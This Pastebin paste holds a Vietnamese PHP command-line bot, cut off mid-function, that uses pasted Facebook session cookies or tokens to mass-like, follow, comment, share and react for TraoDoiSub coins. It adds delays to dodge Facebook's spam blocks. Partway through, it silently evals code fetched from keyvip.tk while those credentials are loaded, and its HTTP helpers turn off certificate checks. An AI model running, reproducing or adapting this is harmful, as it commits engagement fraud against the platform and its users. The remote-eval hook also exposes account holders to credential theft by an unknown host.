Advertisement
Vngosu7

Untitled

Jul 17th, 2021
683
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 36.63 KB | None | 0 0
  1. $do="\033[1;91m"; $maufulldo= "\e[1;47;31m"; $maunenhong= "\033[1;41;33m"; $res="\033[0m"; $red="\e[1;31m"; $pink="\e[1;35m"; $green="\e[1;32m"; $yellow="\e[1;33m"; $y2="\033[0;33m"; $white= "\033[0;37m"; $cyan= "\e[1;36m"; $blue="\e[1;34m"; $ngreen="\033[42m"; $ngblack="\033[40m"; $nen="\033[1;47;1;34m"; $TIME=`date "+%H:%M"`; date_default_timezone_set("Asia/Ho_Chi_Minh");
  2. $useragent="Mozilla/5.0 (Linux; Android 10; SM-J600G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36";
  3. //config
  4. @system('clear');
  5. $_SESSION['check'] = file_exists("log.txt");
  6. if ($_SESSION['check'] =='1'){
  7. echo $green."Bạn Đã Đăng Nhập Trước Đó! Nhấn$yellow Enter$green Để Tiếp Tục, Nhập$red No \033[1;32mĐể Dùng Acc Mới: ";
  8. $_SESSION['nhap'] = trim(fgets(STDIN));
  9. if ($_SESSION['nhap'] !='no' and $_SESSION['nhap'] != 'No' and $_SESSION['nhap'] !=''){
  10. echo $white."~ ".$red."Lựa chọn không xác định\n";
  11. exit;
  12. }
  13. if ($_SESSION['nhap'] =='no' or $_SESSION['nhap'] =='No'){
  14. $my = fopen("log.txt", "w+");
  15. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Nhập Access_Token TDS: ";
  16. $tokentds =trim(fgets(STDIN));
  17. $arr = array("tokentds"=> $tokentds);
  18. fwrite($my,json_encode($arr));
  19. $my = file("log.txt");
  20. $bb = file_get_contents('log.txt');
  21. $cc =json_decode($bb);
  22. }
  23. if ($_SESSION['nhap'] == ''){
  24. $bb = file_get_contents("log.txt");
  25. $cc =json_decode($bb);
  26. $tokentds = $cc->{"tokentds"};
  27.  
  28. }
  29. } else {
  30. $my = fopen("log.txt","w+");
  31. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Nhập Access_Token TDS: ";
  32. $tokentds =trim(fgets(STDIN));
  33. $arr = array("tokentds"=> $tokentds);
  34. fwrite($my,json_encode($arr));
  35. }
  36. $m = login($tokentds);
  37. $mm = json_decode($m);
  38. $sss = $mm->{"success"};
  39. if ($sss=='200'){
  40. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Đăng Nhập Thành Công\n";
  41. // get xu
  42. $user = $mm->{"data"}->{"user"};
  43. $xu = $mm->{"data"}->{"xu"};
  44. }else{
  45. echo $res."~".$yellow."[".$red."✖".$yellow."]".$res." =>".$red." Đăng Nhập Thất Bại\n";
  46. exit;
  47. }
  48. if ($chedo ==1 or $chedo ==3){
  49. $luong = 1;
  50. } else{
  51. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Nhập Số Tài Khoản Muốn Treo: \033[1;36m";
  52. $luong=trim(fgets(STDIN));
  53. if ($luong<1){exit($red."\033[1;37m~\033[1;31m Lựa Chọn Không Xác Định\n");}
  54. }
  55. $c=1;$thu=1;
  56. $mangcookie =[];
  57. if ($chedo <3 ){
  58. for($b=1;$b<=$luong;$b++){
  59. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$yellow." Nhập Cookie Thứ ".$thu.":$white ";
  60. $cooki[$c]=trim(fgets(STDIN));
  61. $ch=curl_init();
  62. $cookie=$cooki[$c];
  63. $access = cookie($cookie,$useragent);
  64. if (explode('\",\"useLocalFilePreview',explode('accessToken\":\"', $access)[1])[0])
  65. {
  66. array_push($mangcookie,$cookie);
  67. $c++;
  68. $thu++;
  69. }else{echo $white."~ ".$red."Cookie Die! Hãy Kiểm Tra Lại\n";$b--;}
  70. }
  71. } else {
  72. for($b=1;$b<=$luong;$b++){
  73. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$yellow." Nhập Token Thứ ".$thu.":$white ";
  74. $cooki[$c]=trim(fgets(STDIN));
  75. $ch=curl_init();
  76. $cookie=$cooki[$c];
  77. $access_token = $cookie;
  78. if(json_decode(file_get_contents('https://graph.facebook.com/me/?access_token='.$access_token))->{'id'}){
  79. array_push($mangcookie,$cookie);
  80. $c++;
  81. $thu++;
  82. }else{
  83. echo $white."~ ".$red."Token Die! Hãy Kiểm Tra Lại\n";$b--;}
  84. }
  85.  
  86. }
  87.  
  88.  
  89. if($luong==1){
  90. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Sau Bao Nhiêu Nhiệm Vụ Bật Kháng Block:\033[1;33m ";
  91. } else{
  92. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Đổi Cấu Hình Sau: \033[1;33m";
  93. }
  94. $doi=trim(fgets(STDIN));
  95. if ($doi<1){
  96. exit($red."\033[1;37m~\033[1;31m Lựa Chọn Không Xác Định\n");
  97. }
  98. if($luong==1){
  99. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Delay Kháng Block:\033[1;33m ";
  100. $dl=trim(fgets(STDIN));
  101. }
  102. @system('clear');
  103. eval(file_get_contents("https://keyvip.tk/logo.php"));
  104. echo $white." $maufulldo Tool TDS Vip By Mạnh Tool $ngblack\n";
  105. for($v=0;$v<= 12;$v++){
  106. echo "\033[1;37m- ";usleep(15000);
  107. echo "\033[1;33m- ";usleep(15000);
  108. }
  109. echo "\033[1;37m- ";usleep(15000);
  110. echo "\033[1;33m-";usleep(15000);
  111. echo"\n";
  112. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$yellow." Tên Tài Khoản: $green".$user."\n";
  113. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$pink." Số Nick Chạy:$green $luong\n";
  114. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$cuan." Xu Hiện Có:$yellow $xu\n";
  115. for($v=0;$v<= 12;$v++){
  116. echo "\033[1;37m- ";usleep(15000);
  117. echo "\033[1;33m- ";usleep(15000);
  118. }
  119. echo "\033[1;37m- ";usleep(15000);
  120. echo "\033[1;33m-";usleep(15000);
  121. echo"\n";
  122. $listnv = [];
  123. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Bật Auto Follow$white (y/n): $yellow";
  124. $chon1=trim(fgets(STDIN));
  125. if ($chon1 == 'y' or $chon1 == 'Y'){
  126. array_push($listnv,'sub');}
  127. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Bật Auto Like$white (y/n): $yellow";
  128. $chon2=trim(fgets(STDIN));
  129. if ($chon2 == 'y' or $chon2 == 'Y'){
  130. array_push($listnv,'like');}
  131. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Bật Auto Comment$white (y/n): $yellow";
  132. $chon3=trim(fgets(STDIN));
  133. if ($chon3 == 'y' or $chon3 == 'Y'){
  134. array_push($listnv,'cmt');}
  135. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Bật Auto Share$white (y/n): $yellow";
  136. $chon4=trim(fgets(STDIN));
  137. if ($chon4 == 'y' or $chon4 == 'Y'){
  138. array_push($listnv,'share');}
  139. if ($chedo < 3){
  140. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Bật Auto Like Page$white (y/n): $yellow";
  141. $chon4=trim(fgets(STDIN));
  142. if ($chon4 == 'y' or $chon4 == 'Y'){
  143. array_push($listnv,'page');}
  144. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Bật Auto Cảm Xúc$white (y/n): $yellow";
  145. $chon4=trim(fgets(STDIN));
  146. if ($chon4 == 'y' or $chon4 == 'Y'){
  147. array_push($listnv,'cx');}
  148. }
  149. if (count($listnv) == 0){exit($red."Chọn Ít Nhất 1 Nhiệm Vụ\n");}
  150. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Nhập Delay Nhiệm Vụ: $yellow";
  151. $timedelay=trim(fgets(STDIN));
  152. for($v=0;$v<= 12;$v++){
  153. echo "\033[1;37m- ";usleep(15000);
  154. echo "\033[1;33m- ";usleep(15000);
  155. }
  156. echo "\033[1;37m- ";usleep(15000);
  157. echo "\033[1;33m-";usleep(15000);
  158. echo"\n";
  159. $q=1;
  160. while ($o <= $_SESSION['i']){
  161. for($l=0;$l<count($mangcookie);$l++){
  162. $cookie = $mangcookie[$l];
  163. if ($chedo < 3){
  164. $access = cookie($cookie,$useragent);
  165. $access_token = explode('\",\"useLocalFilePreview',explode('accessToken\":\"', $access)[1])[0];
  166. } else {
  167. $access_token = $cookie;
  168. }
  169. if(json_decode(file_get_contents('https://graph.facebook.com/me/?access_token='.$access_token))->{'id'}){
  170. $idfb = json_decode(file_get_contents('https://graph.facebook.com/me/?access_token='.$access_token))->{'id'};
  171. $tenfb = json_decode(file_get_contents('https://graph.facebook.com/me/?access_token='.$access_token))->{'name'};
  172. }else{
  173. echo " \r";
  174. echo $res."~".$yellow."[".$red."✖".$yellow."]".$res." =>".$red." Thất Bại, FB Đã Bị Die, Hãy Xem Lại\n";
  175. exit;
  176. }
  177. $h = datnick($idfb,$tokentds);
  178. if ($h == '200'){
  179. echo " \r";
  180. echo $green."Đang Dùng FB: $yellow".$tenfb." \033[1;32mID:\033[1;37m ".$idfb."\n";
  181. $i=1;
  182. $max=0;
  183. while($i<10){
  184. $rand = $listnv[array_rand($listnv,1)];
  185. if ($rand == 'like'){
  186. $list = getnv1('like',$tokentds);
  187. $check = count($list);
  188. if($check==0){
  189. echo " \r";
  190. echo $white."~ ".$red."Hết Nhiệm Vụ Like\r";
  191. #continue;
  192. }
  193.  
  194. for($k=0;$k<$check;$k++) {
  195. $id = $list[$k]->{"id"};
  196. $g = like($access_token,$id,$cookie);
  197. if ($g->{'error'}->{'code'} == 368){
  198. echo " \r";
  199. echo $white."~ ".$red."Nick Đã Bị Block\n";
  200. array_splice($mangcookie,$l,1);
  201. $m = 1;
  202. break;
  203. }
  204. $ck= nhantien('LIKE',$id,$tokentds);
  205. $s = json_decode($ck)->{"success"};
  206. if ($s == '200'){
  207. $t = random_int(31,37);
  208. $mau = "\e[1;$t"."m";
  209. $max=$max+1;
  210. $stt=$stt+1;
  211. $xu = $xu + 200;
  212. echo "\r";
  213. echo " \r";
  214. echo $yellow."[$stt]".$red." ● ".$cyan; usleep(10000);
  215. echo date("H:i:s"); usleep(10000);
  216. echo $red." ●$mau LIKE$red ● $white"; usleep(10000);
  217. echo $id."$red ● $yellow"; usleep(10000);
  218. echo $xu." xu\n";
  219. loadtime($timedelay);
  220. if ($max==$doi){
  221. $max=0;
  222. break;
  223. }
  224. } // nhận tiền
  225. } // foreach
  226.  
  227. if($check!=0){
  228. if($max==0){
  229. if(count($mangcookie)==1){
  230. echo " \r";
  231. for($j = $dl;$j> 0;$j--){
  232. echo $green."Đang Chờ Delay Tránh Block$yellow $j Giây";
  233. sleep(1);
  234. echo "\r";
  235. echo " \r";
  236. }
  237. }else{
  238. break;}
  239. }
  240. if($m==1){
  241. $m=0;
  242. break;
  243. }
  244. }
  245. }
  246. if ($rand == 'sub'){
  247. $list = getnv1('follow',$tokentds);
  248. $check = count($list);
  249. if($check==0){
  250. echo " \r";
  251. echo $white."~ ".$red."Hết Nhiệm Vụ Follow\r";
  252. }
  253.  
  254. for($k=0;$k<$check;$k++) {
  255. $id = $list[$k]->{"id"};
  256. $g = follow($access_token,$id,$cookie);
  257. if ($g->{'error'}->{'code'} == 190){
  258. echo " \r";
  259. echo $white."~ ".$red."Thất Bại! FB Bị Văng Khỏi Web\n";
  260. array_splice($mangcookie,$l,1);
  261. $m = 1;
  262. break;
  263. }
  264. if ($g->{'error'}->{'code'} == 368){
  265. echo " \r";
  266. echo $white."~ ".$red."Đã Bị Block\n";
  267. array_splice($mangcookie,$l,1);
  268. $m = 1;
  269. break;
  270. }
  271. $ck= nhantien('FOLLOW',$id,$tokentds);
  272. $s = json_decode($ck)->{"success"};
  273. if ($s == '200'){
  274. $t = random_int(31,37);
  275. $mau = "\e[1;$t"."m";
  276. $max=$max+1;
  277. $stt=$stt+1;
  278. $xu = $xu + 600;
  279. echo "\r";
  280. echo " \r";
  281. echo $yellow."[$stt]".$red." ● ".$cyan; usleep(10000);
  282. echo date("H:i:s"); usleep(10000);
  283. echo $red." ●$mau FOLLOW$red ● $white"; usleep(10000);
  284. echo $id."$red ● $yellow"; usleep(10000);
  285. echo $xu." xu\n";
  286. loadtime($timedelay);
  287. if ($max==$doi){
  288. $max=0;
  289. break;
  290. }
  291. } // nhận tiền
  292. } // foreach
  293.  
  294. if($check!=0){
  295. if($max==0){
  296. if(count($mangcookie)==1){
  297. echo " \r";
  298. for($j = $dl;$j> 0;$j--){
  299. echo $green."Đang Chờ Delay Tránh Block$yellow $j Giây";
  300. sleep(1);
  301. echo "\r";
  302. echo " \r";
  303. }
  304. }else{
  305. break;}
  306. }
  307. if($m==1){
  308. $m=0;
  309. break;
  310. }
  311.  
  312. }
  313. }
  314. if ($rand == 'cmt'){
  315. $list = getnv1('comment',$tokentds);
  316. $check = count($list);
  317. if($check==0){
  318. echo " \r";
  319. echo $white."~ ".$red."Hết Nhiệm Vụ Comment\r";
  320. }
  321.  
  322. for($k=0;$k<$check;$k++) {
  323. $uid = $list[$k]->{"id"};
  324. $msg = $list[$k]->{"msg"};
  325. $g = cmt($access_token,$uid,$cookie,$msg);
  326. if ($g->{'error'}->{'code'} == 190){
  327. echo " \r";
  328. echo $white."~ ".$red."Thất Bại! FB Bị Văng Khỏi Web\n";
  329. array_splice($mangcookie,$l,1);
  330. $m = 1;
  331. break;
  332. }
  333. if ($g->{'error'}->{'code'} == 368){
  334. echo " \r";
  335. echo $white."~ ".$red."Đã Bị Block\n";
  336. array_splice($mangcookie,$l,1);
  337. $m = 1;
  338. break;
  339. }
  340. $ck= nhantien('COMMENT',$uid,$tokentds);
  341. $s = json_decode($ck)->{"success"};
  342. if ($s == '200'){
  343. $t = random_int(31,37);
  344. $mau = "\e[1;$t"."m";
  345. $max=$max+1;
  346. $stt=$stt+1;
  347. $xu = $xu + 600;
  348. echo "\r";
  349. echo " \r";
  350. echo $yellow."[$stt]".$red." ● ".$cyan; usleep(10000);
  351. echo date("H:i:s"); usleep(10000);
  352. echo $red." ●$mau CMT$red ● $white"; usleep(10000);
  353. echo $uid."$red ● $yellow"; usleep(10000);
  354. echo $xu." xu\n";
  355. loadtime($timedelay);
  356. if ($max==$doi){
  357. $max=0;
  358. break;
  359. }
  360. } // nhận tiền
  361. } // foreach
  362.  
  363. if($check!=0){
  364. if($max==0){
  365. if(count($mangcookie)==1){
  366. echo " \r";
  367. for($j = $dl;$j> 0;$j--){
  368. echo $green."Đang Chờ Delay Tránh Block$yellow $j Giây";
  369. sleep(1);
  370. echo "\r";
  371. echo " \r";
  372. }
  373. }else{
  374. break;}
  375. }
  376. if($m==1){
  377. $m=0;
  378. break;
  379. }
  380. }
  381. }
  382. if ($rand == 'page'){
  383. $list = getnv1('page',$tokentds);
  384. $check = count($list);
  385. if($check==0){
  386. echo " \r";
  387. echo $white."~ ".$red."Hết Nhiệm Vụ Like Page\r";
  388. }
  389.  
  390. for($k=0;$k<$check;$k++) {
  391. $id = $list[$k]->{"id"};
  392. $g = page($id,$cookie);
  393. if ($g->{'error'}->{'code'} == 190){
  394. echo " \r";
  395. echo $white."~ ".$red."Thất Bại! FB Bị Văng Khỏi Web\n";
  396. array_splice($mangcookie,$l,1);
  397. $m = 1;
  398. break;
  399. }
  400. if ($g->{'error'}->{'code'} == 368){
  401. echo " \r";
  402. echo $white."~ ".$red."Đã Bị Block\n";
  403. array_splice($mangcookie,$l,1);
  404. $m = 1;
  405. break;
  406. }
  407. $ck= nhantien('PAGE',$id,$tokentds);
  408. $s = json_decode($ck)->{"success"};
  409. if ($s == '200'){
  410. $t = random_int(31,37);
  411. $mau = "\e[1;$t"."m";
  412. $max=$max+1;
  413. $stt=$stt+1;
  414. $xu = $xu + 600;
  415. echo "\r";
  416. echo " \r";
  417. echo $yellow."[$stt]".$red." ● ".$cyan; usleep(10000);
  418. echo date("H:i:s"); usleep(10000);
  419. echo $red." ●$mau PAGE$red ● $white"; usleep(10000);
  420. echo $id."$red ● $yellow"; usleep(10000);
  421. echo $xu." xu\n";
  422. loadtime($timedelay);
  423. if ($max==$doi){
  424. $max=0;
  425. break;
  426. }
  427. } // nhận tiền
  428. } // foreach
  429.  
  430. if($check!=0){
  431. if($max==0){
  432. if(count($mangcookie)==1){
  433. echo " \r";
  434. for($j = $dl;$j> 0;$j--){
  435. echo $green."Đang Chờ Delay Tránh Block$yellow $j Giây";
  436. sleep(1);
  437. echo "\r";
  438. echo " \r";
  439. }
  440. }else{
  441. break;}
  442. }
  443. if($m==1){
  444. $m=0;
  445. break;
  446. }
  447. }
  448. }
  449. if ($rand == 'share'){
  450. $list = getnv1('share',$tokentds);
  451. $check = count($list);
  452. if($check==0){
  453. echo " \r";
  454. echo $white."~ ".$red."Hết Nhiệm Vụ Share\r";
  455. }
  456. for($k=0;$k<$check;$k++) {
  457. $id = $list[$k]->{"id"};
  458. $g = share($id,$access_token);
  459. $ck= nhantien('SHARE',$id,$tokentds);
  460. $s = json_decode($ck)->{"success"};
  461. if ($s == '200'){
  462. $t = random_int(31,37);
  463. $mau = "\e[1;$t"."m";
  464. $max=$max+1;
  465. $stt=$stt+1;
  466. $xu = $xu + 800;
  467. echo "\r";
  468. echo " \r";
  469. echo $yellow."[$stt]".$red." ● ".$cyan; usleep(10000);
  470. echo date("H:i:s"); usleep(10000);
  471. echo $red." ●$mau SHARE$red ● $white"; usleep(10000);
  472. echo $id."$red ● $yellow"; usleep(10000);
  473. echo $xu." xu\n";
  474. loadtime($timedelay);
  475. if ($max==$doi){
  476. $max=0;
  477. break;
  478. }
  479. } // nhận tiền
  480. } // foreach
  481.  
  482. if($check!=0){
  483. if($max==0){
  484. if(count($mangcookie)==1){
  485. echo " \r";
  486. for($j = $dl;$j> 0;$j--){
  487. echo $green."Đang Chờ Delay Tránh Block$yellow $j Giây";
  488. sleep(1);
  489. echo "\r";
  490. echo " \r";
  491. }
  492. }else{
  493. break;}
  494. }
  495. if($m==1){
  496. $m=0;
  497. break;
  498. }
  499. }
  500. }
  501. if ($rand == 'group'){
  502. $list = getnv1('group',$tokentds);
  503. $check = count($list);
  504. if($check==0){
  505. echo " \r";
  506. echo $white."~ ".$red."Hết Nhiệm Vụ Join Group\r";
  507. }
  508. for($k=0;$k<$check;$k++) {
  509. $id = $list[$k]->{"id"};
  510. $g = joingr($id,$cookie);
  511. $ck= nhantien('GROUP',$id,$tokentds);
  512. $s = json_decode($ck)->{"success"};
  513. if ($s == '200'){
  514. $t = random_int(31,37);
  515. $mau = "\e[1;$t"."m";
  516. $max=$max+1;
  517. $stt=$stt+1;
  518. $xu = $xu + 1400;
  519. echo "\r";
  520. echo " \r";
  521. echo $yellow."[$stt]".$red." ● ".$cyan; usleep(10000);
  522. echo date("H:i:s"); usleep(10000);
  523. echo $red." ●$mau GROUP$red ● $white"; usleep(10000);
  524. echo $id."$red ● $yellow"; usleep(10000);
  525. echo $xu." xu\n";
  526. loadtime($timedelay);
  527. if ($max==$doi){
  528. $max=0;
  529. break;
  530. }
  531. } // nhận tiền
  532. else{ echo "Lá»—i \n"; }
  533. } // foreach
  534.  
  535. if($check!=0){
  536. if($max==0){
  537. if(count($mangcookie)==1){
  538. echo " \r";
  539. for($j = $dl;$j> 0;$j--){
  540. echo $green."Đang Chờ Delay Tránh Block$yellow $j Giây";
  541. sleep(1);
  542. echo "\r";
  543. echo " \r";
  544. }
  545. }else{
  546. break;}
  547. }
  548. if($m==1){
  549. $m=0;
  550. break;
  551. }
  552. }
  553. }
  554. if ($rand == 'cx'){
  555. $list = getnv1('reaction',$tokentds);
  556. $check = count($list);
  557. if($check==0){
  558. echo " \r";
  559. echo $white."~ ".$red."Hết Nhiệm Vụ Cảm Xúc\r";
  560. #continue;
  561. }
  562.  
  563. for($k=0;$k<$check;$k++) {
  564. $id = $list[$k]->{"id"};
  565. $type = $list[$k]->{"type"};
  566. $g = camxuc($id,$type,$cookie);
  567. if ($g->{'error'}->{'code'} == 190){
  568. echo " \r";
  569. echo $white."~ ".$red."Thất Bại! FB Bị Văng Khỏi Web\n";
  570. array_splice($mangcookie,$l,1);
  571. $m = 1;
  572. break;
  573. }
  574. if ($g->{'error'}->{'code'} == 368){
  575. echo " \r";
  576. echo $white."~ ".$red."Đã Bị Block\n";
  577. array_splice($mangcookie,$l,1);
  578. $m = 1;
  579. break;
  580. }
  581. $ck= nhantien($type,$id,$tokentds);
  582. $s = json_decode($ck)->{"success"};
  583. if ($s == '200'){
  584. $t = random_int(31,37);
  585. $mau = "\e[1;$t"."m";
  586. $max=$max+1;
  587. $stt=$stt+1;
  588. $xu = $xu + 400;
  589. echo "\r";
  590. echo " \r";
  591. echo $yellow."[$stt]".$red." ● ".$cyan; usleep(10000);
  592. echo date("H:i:s"); usleep(10000);
  593. echo $red." ●$mau $type$red ● $white"; usleep(10000);
  594. echo $id."$red ● $yellow"; usleep(10000);
  595. echo $xu." xu\n";
  596. loadtime($timedelay);
  597. if ($max==$doi){
  598. $max=0;
  599. break;
  600. }
  601. } // nhận tiền
  602. } // foreach
  603.  
  604. if($check!=0){
  605. if($max==0){
  606. if(count($mangcookie)==1){
  607. echo " \r";
  608. for($j = $dl;$j> 0;$j--){
  609. echo $green."Đang Chờ Delay Tránh Block$yellow $j Giây";
  610. sleep(1);
  611. echo "\r";
  612. echo " \r";
  613. }
  614. }else{
  615. break;}
  616. }
  617. if($m==1){
  618. $m=0;
  619. break;
  620. }
  621. }
  622. }
  623.  
  624. } //vĂ²ng while trong
  625.  
  626. } //vĂ²ng cấu hình
  627. else{ exit($red."Cấu Hình Thất Bại, Hãy Thêm FB:\033[1;32m $tenfb $red"."Vào Cấu Hình\n"); }
  628. } // vĂ²ng for
  629. if (count($mangcookie)==1 && empty($dl)){
  630. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Vẫn Còn 1 Acc. Nhập Delay Kháng Block: ";
  631. $dl=trim(fgets(STDIN));
  632. }
  633. if (count($mangcookie)==0){
  634. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Tất Cả Cookie Để Die, Hãy Nhập Lại:\n";
  635. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Nhập Số Nick Cần Treo:\033[1;36m ";
  636. $luong=trim(fgets(STDIN));
  637. if ($luong<1){exit($red."\033[1;37m~\033[1;31m Lựa Chọn Không Xác Định\n");}
  638. $c=1;$thu=1;
  639. if ($chedo <3 ){
  640. for($b=1;$b<=$luong;$b++){
  641. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$yellow." Nhập Cookie Thứ ".$thu.":$white ";
  642. $cooki[$c]=trim(fgets(STDIN));
  643. $ch=curl_init();
  644. $cookie=$cooki[$c];
  645. $access = cookie($cookie,$useragent);
  646. if (explode('\",\"useLocalFilePreview',explode('accessToken\":\"', $access)[1])[0])
  647. {
  648. array_push($mangcookie,$cookie);
  649. $c++;
  650. $thu++;
  651. }else{echo $white."~ ".$red."Cookie Không Hợp Lệ, Hãy Kiểm Tra Lại\n";$b--;}
  652. }
  653. } else {
  654. for($b=1;$b<=$luong;$b++){
  655. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$yellow." NhậpToken Thứ ".$thu.":$white ";
  656. $cooki[$c]=trim(fgets(STDIN));
  657. $ch=curl_init();
  658. $cookie=$cooki[$c];
  659. $access_token = $cookie;
  660. if(json_decode(file_get_contents('https://graph.facebook.com/me/?access_token='.$access_token))->{'id'}){
  661. array_push($mangcookie,$cookie);
  662. $c++;
  663. $thu++;
  664. }else{
  665. echo $white."~ ".$red."Token Không Đúng, Hãy Nhập Lại\n";$b--;
  666. }
  667. }
  668.  
  669. }
  670. if (count($mangcookie)==1 && empty($dl)){
  671. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Sau Bao Nhiêu Nhiệm Vụ Bật Kháng Block:\033[1;32m ";
  672. $doi=trim(fgets(STDIN));
  673. echo $res."~".$red."[".$green."✔".$red."]".$res." =>".$green." Delay Kháng Block: ";
  674. $dl=trim(fgets(STDIN));
  675. }
  676. } // die hết cookie
  677. } //
  678. function cookie($cookie,$useragent){
  679. $ch = curl_init();
  680. curl_setopt($ch, CURLOPT_URL, 'https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed');
  681. $head[] = "Connection: keep-alive";
  682. $head[] = "Keep-Alive: 300";
  683. $head[] = "authority: m.facebook.com";
  684. $head[] = "ccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
  685. $head[] = "accept-language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5";
  686. $head[] = "cache-control: max-age=0";
  687. $head[] = "upgrade-insecure-requests: 1";
  688. $head[] = "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
  689. $head[] = "sec-fetch-site: none";
  690. $head[] = "sec-fetch-mode: navigate";
  691. $head[] = "sec-fetch-user: ?1";
  692. $head[] = "sec-fetch-dest: document";
  693. curl_setopt($ch, CURLOPT_USERAGENT,$useragent );
  694. curl_setopt($ch, CURLOPT_ENCODING, '');
  695. curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  696. curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
  697. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  698. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  699. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  700. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
  701. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  702. curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
  703. $access = curl_exec($ch);
  704. curl_close($ch);
  705. return $access;
  706. }
  707. function follow($access_token,$id,$cookie){
  708. $ch=curl_init();
  709. curl_setopt($ch, CURLOPT_URL, 'https://graph.facebook.com/'.$id.'/subscribers');
  710. $head[] = "Connection: keep-alive";
  711. $head[] = "Keep-Alive: 300";
  712. $head[] = "authority: m.facebook.com";
  713. $head[] = "ccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
  714. $head[] = "accept-language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5";
  715. $head[] = "cache-control: max-age=0";
  716. $head[] = "upgrade-insecure-requests: 1";
  717. $head[] = "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
  718. $head[] = "sec-fetch-site: none";
  719. $head[] = "sec-fetch-mode: navigate";
  720. $head[] = "sec-fetch-user: ?1";
  721. $head[] = "sec-fetch-dest: document";
  722. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36');
  723. curl_setopt($ch, CURLOPT_ENCODING, '');
  724. curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  725. curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
  726. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  727. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  728. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  729. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
  730. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  731. curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
  732. $data = array('access_token' => $access_token);
  733. curl_setopt($ch, CURLOPT_POST,count($data));
  734. curl_setopt($ch, CURLOPT_POSTFIELDS,$data);
  735. $access = curl_exec($ch);
  736. curl_close($ch);
  737. return json_decode($access);
  738. }
  739. function like($access_token,$id,$cookie){
  740. $ch=curl_init();
  741. curl_setopt($ch, CURLOPT_URL, 'https://graph.facebook.com/'.$id.'/likes');
  742. $head[] = "Connection: keep-alive";
  743. $head[] = "Keep-Alive: 300";
  744. $head[] = "authority: m.facebook.com";
  745. $head[] = "ccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
  746. $head[] = "accept-language: vi-VN,vi;q=0.9,fr-FR;q=0.8,fr;q=0.7,en-US;q=0.6,en;q=0.5";
  747. $head[] = "cache-control: max-age=0";
  748. $head[] = "upgrade-insecure-requests: 1";
  749. $head[] = "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
  750. $head[] = "sec-fetch-site: none";
  751. $head[] = "sec-fetch-mode: navigate";
  752. $head[] = "sec-fetch-user: ?1";
  753. $head[] = "sec-fetch-dest: document";
  754. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36');
  755. curl_setopt($ch, CURLOPT_ENCODING, '');
  756. curl_setopt($ch, CURLOPT_COOKIE, $cookie);
  757. curl_setopt($ch, CURLOPT_HTTPHEADER, $head);
  758. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  759. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  760. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  761. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
  762. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  763. curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
